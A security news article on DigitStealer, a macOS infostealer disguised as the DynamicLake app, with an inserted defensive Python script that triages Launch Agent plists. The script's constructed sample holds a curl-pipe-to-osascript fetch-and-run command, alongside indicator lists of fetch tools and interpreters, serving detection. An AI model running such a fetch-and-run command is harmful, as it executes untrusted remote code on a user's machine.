A new infostealer is targeting macOS users by masquerading as the legitimate DynamicLake UI enhancement and productivity utility and possibly Google’s Drive for desktop app.
Multi-stage delivery
Dubbed DigitStealer by Jamf researchers, this threat is unusually sophisticated.
Before it’s run, a bash script – also executed entirely in-memory – checks the system’s country setting and terminates if it indicates that the machine is located in specific regions.
It also checks whether the machine is virtual and whether it’s running on an Apple Silicon M2 chip or newer (by checking for specific hardware features).
“The malware avoids running on virtual machines, Intel-based Macs, and whether by design or mistake, systems using the M1 chip, even though it is also part of the Apple Silicon family. Instead, it targets devices with newer ARM features introduced with M2 or later,” the researchers found.
If it “decides” the conditions are favorable, the script retrieves four separate payloads and starts dropping and running them.
The first payload is a simple AppleScript infostealer that asks users to enter their password and, if they do, exfiltrates credentials and small user files (documents, notes, etc.) and resets the macOS TCC database (where macOS records which apps are allowed to access sensitive data or system features).
The second payload zips and exfiltrates data from various popular browsers, the Keychain database, VPN configurations, Telegram’s tdata folder (which can be used to hijack Telegram accounts), and cryptocurrency wallet files from Ledger, Electrum, Exodus, Coinomi, etc.
The third payload replaces the app.asar file for the Ledger Wallet/Ledger Live crypto application with a trojanized version, thus making it connect to an attacker-operated server and essentially hijacking it, allowing the attacker to intercept or manipulate the victim’s crypto wallet data.
The fourth payload drops and loads a Launch Agent on the target system for persistence, and it dynamically retrieves payloads from the attacker’s server each time it runs. Initially, that final payload is a backdoor – a JavaScript for Automation (JXA) script with full AppleScript capabilities – but the attacker can change the payloads at will.
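A small triage script for the Launch Agent persistence pattern described above, added here as an example that is not from Jamf’s report or the original article: it parses a LaunchAgent plist and flags the “fetch from a URL, hand the result to an interpreter, re-run on a schedule” shape. The sample plists are constructed and the indicator lists are assumptions, not DigitStealer’s actual artifacts.

```python
"""Triage macOS Launch Agent plists for fetch-and-run persistence (added example)."""
import plistlib
from pathlib import Path
# Assumed indicator lists (not Jamf's rules): tools that pull from the network
# and interpreters that would run whatever was pulled (osascript covers JXA).
FETCH_TOOLS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3"}

def triage(plist_bytes: bytes) -> dict:
    """Return {'label', 'suspicious', 'reasons'} for one LaunchAgent plist."""
    plist = plistlib.loads(plist_bytes)
    args = list(plist.get("ProgramArguments") or [])
    if "Program" in plist:
        args.insert(0, plist["Program"])
    cmd = " ".join(str(a) for a in args)
    # Split on whitespace and shell separators so piped one-liners are seen whole
    tokens = cmd.replace("|", " ").replace(";", " ").replace("&&", " ").split()
    names = {Path(t).name for t in tokens}
    fetch, interp = names & FETCH_TOOLS, names & INTERPRETERS
    has_url = any(t.startswith(("http://", "https://")) for t in tokens)
    reasons = []
    if fetch and interp:
        reasons.append(f"fetches with {sorted(fetch)}, executes via {sorted(interp)}")
    if has_url:
        reasons.append("command line embeds a URL")
    # Context only: RunAtLoad/StartInterval/KeepAlive are normal for benign agents too
    if plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is set")
    if "StartInterval" in plist or "KeepAlive" in plist:
        reasons.append("re-runs on a schedule (StartInterval/KeepAlive)")
    return {"label": plist.get("Label"), "suspicious": bool(fetch and interp) or has_url,
            "reasons": reasons}

def scan_dir(directory: str = "~/Library/LaunchAgents") -> list:
    """Triage every .plist in a LaunchAgents folder (the per-user one by default)."""
    return [triage(p.read_bytes()) for p in Path(directory).expanduser().glob("*.plist")]

# Constructed sample: an agent that re-downloads its payload on every run.
SAMPLE_SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string>
<string>curl -s https://example.invalid/stage | osascript -l JavaScript</string></array>
<key>RunAtLoad</key><true/><key>StartInterval</key><integer>600</integer>
</dict></plist>"""

# Constructed benign control: a local binary, no network fetch.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
<key>RunAtLoad</key><true/></dict></plist>"""
```

Run `scan_dir()` on a Mac to triage the current user’s agents; anything marked suspicious still needs a human to read the actual command line before acting on it.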
Tricking users into running the “app”
“The sample that was discovered comes in the form of an unsigned disk image titled DynamicLake.dmg,” the researchers shared. “After digging further, we identified a few additional disk images tied to this campaign.”
The DynamicLake.dmg has been distributed via https[:]//dynamiclake[.]org, a domain and site imitating those of the legitimate macOS utility of the same name.
Users who have been tricked into visiting this spoofed site are instructed to drag the file (actually the initial script) into the Mac’s Terminal, thus bypassing Gatekeeper.
The served malware installer (Source: Jamf)
Be careful when downloading Mac apps
“Attribution for this specific variant remains unclear currently. However, the techniques used suggest a deeper understanding of the macOS operating system and a continued focus on evading detection,” the researchers noted.
Malware authors continue abusing legitimate services and distribution methods to bypass macOS security controls and improve their chances of success, they added.
In the last few months, attackers have been creating convincing replicas of GitHub repos for popular Mac apps and using the “drag-to-Terminal” trick to get unsuspecting users to run malicious scripts. (The usual way to install an app is to drag it into the Applications folder.)
More recently, a Reddit user reported seeing this fake DynamicLake app as well as a fake version of AirPosture, which may or may not lead to a DigitStealer infection.
Users should be careful when searching for and installing new apps:
- Double-check you are on the right site / GitHub repo
- Use VirusTotal to scan the downloaded installer before running it
- Never drag an app to the Terminal
- You can use specialized apps to verify the app’s/installer’s signature